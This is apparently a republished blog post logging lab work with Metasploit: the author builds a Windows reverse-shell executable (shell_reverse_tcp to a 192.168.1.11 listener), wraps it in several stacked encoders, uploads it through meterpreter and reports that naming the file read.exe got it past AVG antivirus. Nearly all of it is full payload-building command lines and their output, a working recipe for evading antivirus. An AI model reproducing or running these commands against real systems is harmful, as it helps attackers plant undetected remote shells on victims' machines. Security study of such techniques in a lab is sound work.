Metasploit multi-encoding
Source: Internet | Editor: 程序博客网 | Time: 2024/06/06 04:58
```
root@bt:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o payload3.exe
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)
[*] x86/alpha_upper succeeded with size 967 (iteration=1)
[*] x86/alpha_upper succeeded with size 2003 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 2032 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 2061 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 2090 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2119 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2148 (iteration=5)
[*] x86/countdown succeeded with size 2166 (iteration=1)
[*] x86/countdown succeeded with size 2184 (iteration=2)
[*] x86/countdown succeeded with size 2202 (iteration=3)
[*] x86/countdown succeeded with size 2220 (iteration=4)
[*] x86/countdown succeeded with size 2238 (iteration=5)
root@bt:~# ls
Desktop  payload1.exe  payload2.exe  payload3.exe
root@bt:~# file payload3.exe
payload3.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
root@bt:~#
```
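Generating payload3.exe took a long time, about half an hour, probably because this is a virtual machine with only 512 MB of memory.
Then I uploaded it to XP, and it was still reported as a threat: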
```
meterpreter > upload payload3.exe
[*] uploading : payload3.exe -> payload3.exe
[*] uploaded : payload3.exe -> payload3.exe
meterpreter >
```
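The book says it successfully evaded the antivirus software, but here it was still reported as a threat, probably because my antivirus software is newer.
Later, the second time I generated that payload.exe, it was much faster; I don't know why.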
```
root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o payload_time.exe
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)
[*] x86/alpha_upper succeeded with size 966 (iteration=1)
[*] x86/alpha_upper succeeded with size 2000 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 2029 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 2058 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 2087 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2116 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2145 (iteration=5)
[*] x86/countdown succeeded with size 2163 (iteration=1)
[*] x86/countdown succeeded with size 2181 (iteration=2)
[*] x86/countdown succeeded with size 2199 (iteration=3)
[*] x86/countdown succeeded with size 2217 (iteration=4)
[*] x86/countdown succeeded with size 2235 (iteration=5)

real 1m34.085s
user 0m50.987s
sys 0m40.059s
root@bt:~#
```
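But on XP it was still reported as a threat.
After that, I wondered whether the exe file name was the problem, so I generated one with a very ordinary name, readme.exe, and this time it actually evaded detection by the AVG antivirus software.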
```
root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o read.exe
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)
[*] x86/alpha_upper succeeded with size 966 (iteration=1)
[*] x86/alpha_upper succeeded with size 2000 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 2029 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 2058 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 2087 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2116 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2145 (iteration=5)
[*] x86/countdown succeeded with size 2163 (iteration=1)
[*] x86/countdown succeeded with size 2181 (iteration=2)
[*] x86/countdown succeeded with size 2199 (iteration=3)
[*] x86/countdown succeeded with size 2217 (iteration=4)
[*] x86/countdown succeeded with size 2235 (iteration=5)

real 1m33.468s
user 0m52.195s
sys 0m39.830s
root@bt:~#
```

```
meterpreter > upload read.exe
[*] uploading : read.exe -> read.exe
[*] uploaded : read.exe -> read.exe
meterpreter >
```